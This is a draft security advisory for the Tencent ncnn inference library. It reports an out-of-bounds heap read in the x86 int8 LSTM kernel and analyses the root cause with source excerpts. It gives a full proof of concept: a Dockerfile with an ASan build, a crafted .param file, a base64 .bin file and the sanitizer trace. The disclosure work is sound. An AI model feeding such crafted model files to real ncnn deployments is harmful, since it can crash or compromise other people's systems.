All advisories
Draft

Heap Buffer Overflow in x86 Int8 LSTM

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

Heap Buffer Overflow in x86 Int8 LSTM

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/lstm_int8.h:2249 in lstm_int8
Sanitizer verdict: heap-buffer-overflow

Summary

An LSTM layer whose declared weight_data_size and hidden_size imply a small per-gate weight width, but which is wired to a much wider input blob, makes the x86 int8 path read far past its packed weight buffer. The packed weight Mat is sized at pipeline-creation time from weight_data_size / num_directions / hidden_size / 4, while the AVX512VNNI inference kernel walks the weight pointer according to the runtime input width bottom_blob_int8.w. With 1=8, 3=2 and a 64-wide input, the kernel advances 512 bytes through a 176-byte weight row and the 32-byte _mm256_loadu_si256 at src/layer/x86/lstm_int8.h:2249 reads out of bounds. ncnnoptimize reaches this while running ModelWriter::shape_inference() over the attacker's .param/.bin pair.

Detail

LSTM::load_param stores weight_data_size = pd.get(1, 0); and hidden_size = pd.get(3, num_output); verbatim, and LSTM_x86::create_pipeline_int8 derives the input width from them alone — the layer has no knowledge of the blob it will actually be fed, and no later check reconciles the two.

// src/layer/x86/lstm_x86.cpp:739
    const int size = weight_data_size / num_directions / hidden_size / 4;

// src/layer/x86/lstm_int8.h:52
#if __AVX512VNNI__
    weight_data_tm.create(size + 4 + num_output + 4, hidden_size / 4 + hidden_size % 4, num_directions, 16u, 16);

// src/layer/x86/lstm_int8.h:1719
    int size = bottom_blob_int8.w;

// src/layer/x86/lstm_int8.h:2245
            for (; i + 15 < size; i += 16)
            {
                __m128i _xi = _mm_loadu_si128((const __m128i*)(x + i));
                __m256i _w0 = _mm256_loadu_si256((const __m256i*)kptr);
                __m256i _w1 = _mm256_loadu_si256((const __m256i*)(kptr + 32));

The two size values are computed from different sources. The PoC declares 0=2 1=8 2=0 3=2 8=1, so at creation time size = 8 / 1 / 2 / 4 = 1 and weight_data_tm is created with w = 1 + 4 + 2 + 4 = 11 elements of 16 packed int8 lanes and h = 2; that is 176 bytes per row and a 352-byte payload, which fastMalloc backs with 420 bytes once the 4-byte refcount and the 64-byte NCNN_MALLOC_OVERREAD pad are added — the region size in the ASan report.

At inference size is re-derived as bottom_blob_int8.w, which the graph sets to 64 via Input data 0 1 data 0=64 1=1. For hidden_size = 2 the AVX-512 four-row loop is skipped and the two-row loop runs once with q = 0, so kptr starts at row 0 of the 176-byte row. The loop then iterates i = 0, 16, 32, 48 and advances kptr += 128 each time, so the fourth iteration loads from kptr + 32 at byte offset 416 of the allocation. The 32-byte load spans bytes 416..447 while the allocation ends at 420, which is precisely the fault ASan reports at lstm_int8.h:2249. A larger declared input width extends the walk arbitrarily far past the buffer.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-buffer-overflow-in-x86-int8-lstm && cd ncnn-poc-heap-buffer-overflow-in-x86-int8-lstm

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'EOF'
7767517
2 2
Input data 0 1 data 0=64 1=1
LSTM lstm 1 1 data out 0=2 1=8 2=0 3=2 8=1
EOF

base64 -d > poc.bin <<'EOF'
VsACAM3MzD3NzMw9zczMPc3MzD3NzMw9zczMPc3MzD3NzMw9VsACAM3MzD3NzMw9zczMPc3MzD3N
zMw9zczMPc3MzD3NzMw9VsACAM3MzD3NzMw9zczMPc3MzD3NzMw9zczMPc3MzD3NzMw9zczMPc3M
zD3NzMw9zczMPc3MzD3NzMw9zczMPc3MzD1WwAIAzczMPc3MzD3NzMw9zczMPc3MzD3NzMw9zczM
Pc3MzD1WwAIAzczMPc3MzD3NzMw9zczMPc3MzD3NzMw9zczMPc3MzD0=
EOF

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param poc.bin out.param out.bin 0

AddressSanitizer output:

shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x5150000137e0 at pc 0x59e7e617f06e bp 0x7ffe3ce3e2f0 sp 0x7ffe3ce3e2e0
READ of size 32 at 0x5150000137e0 thread T0
    #0 0x59e7e617f06d in _mm256_loadu_si256(long long __vector(4) const*) /usr/lib/gcc/x86_64-linux-gnu/13/include/avxintrin.h:929
    #1 0x59e7e617f06d in lstm_int8 /ncnn/src/layer/x86/lstm_int8.h:2249
    #2 0x59e7e619c9a5 in ncnn::lstm_int8_avx512vnni(ncnn::Mat const&, ncnn::Mat const&, ncnn::Mat&, int, ncnn::Mat const&, ncnn::Mat const&, ncnn::Mat const&, ncnn::Mat const&, ncnn::Mat&, ncnn::Mat&, ncnn::Option const&) /ncnn/src/layer/x86/lstm_x86_avx512vnni.cpp:26
    #3 0x59e7e5f78a4b in lstm_int8 /ncnn/src/layer/x86/lstm_int8.h:1690
    #4 0x59e7e5ffaca7 in ncnn::LSTM_x86_avx512::forward_int8(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/lstm_x86_avx512.cpp:899
    #5 0x59e7e5fc3276 in ncnn::LSTM_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/lstm_x86_avx512.cpp:645
    #6 0x59e7e214b70b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
    #7 0x59e7e2133b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #8 0x59e7e21939e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #9 0x59e7e20253c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #10 0x59e7e20a2eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #11 0x73617fbb41c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #12 0x73617fbb428a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #13 0x59e7e2022624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x5150000137e4 is located 0 bytes after 420-byte region [0x515000013640,0x5150000137e4)
allocated by thread T0 here:
    #0 0x73618022df1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x59e7e20f7433 in fastMalloc /ncnn/src/allocator.h:62
    #2 0x59e7e20f7433 in ncnn::Mat::create(int, int, int, unsigned long, int, ncnn::Allocator*) /ncnn/src/mat.cpp:583
    #3 0x59e7e614c0b6 in lstm_transform_weight_int8 /ncnn/src/layer/x86/lstm_int8.h:53
    #4 0x59e7e619c908 in ncnn::lstm_transform_weight_int8_avx512vnni(ncnn::Mat const&, ncnn::Mat const&, ncnn::Mat const&, ncnn::Mat const&, ncnn::Mat const&, ncnn::Mat&, ncnn::Mat&, ncnn::Mat&, int, int, int, int, ncnn::Option const&) /ncnn/src/layer/x86/lstm_x86_avx512vnni.cpp:16
    #5 0x59e7e5f59020 in lstm_transform_weight_int8 /ncnn/src/layer/x86/lstm_int8.h:30
    #6 0x59e7e5fde5e5 in ncnn::LSTM_x86_avx512::create_pipeline_int8(ncnn::Option const&) /ncnn/build/src/layer/x86/lstm_x86_avx512.cpp:741
    #7 0x59e7e5f9ac81 in ncnn::LSTM_x86_avx512::create_pipeline(ncnn::Option const&) /ncnn/build/src/layer/x86/lstm_x86_avx512.cpp:38
    #8 0x59e7e218ec96 in ncnn::Net::load_model(ncnn::DataReader const&) /ncnn/src/net.cpp:2094
    #9 0x59e7e218f90a in ncnn::Net::load_model(_IO_FILE*) /ncnn/src/net.cpp:2257
    #10 0x59e7e218fc91 in ncnn::Net::load_model(char const*) /ncnn/src/net.cpp:2292
    #11 0x59e7e20a2caf in main /ncnn/tools/ncnnoptimize.cpp:2797
    #12 0x73617fbb41c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #13 0x73617fbb428a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #14 0x59e7e2022624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/lib/gcc/x86_64-linux-gnu/13/include/avxintrin.h:929 in _mm256_loadu_si256(long long __vector(4) const*)

Credit

Zheng Yu @ DepthFirst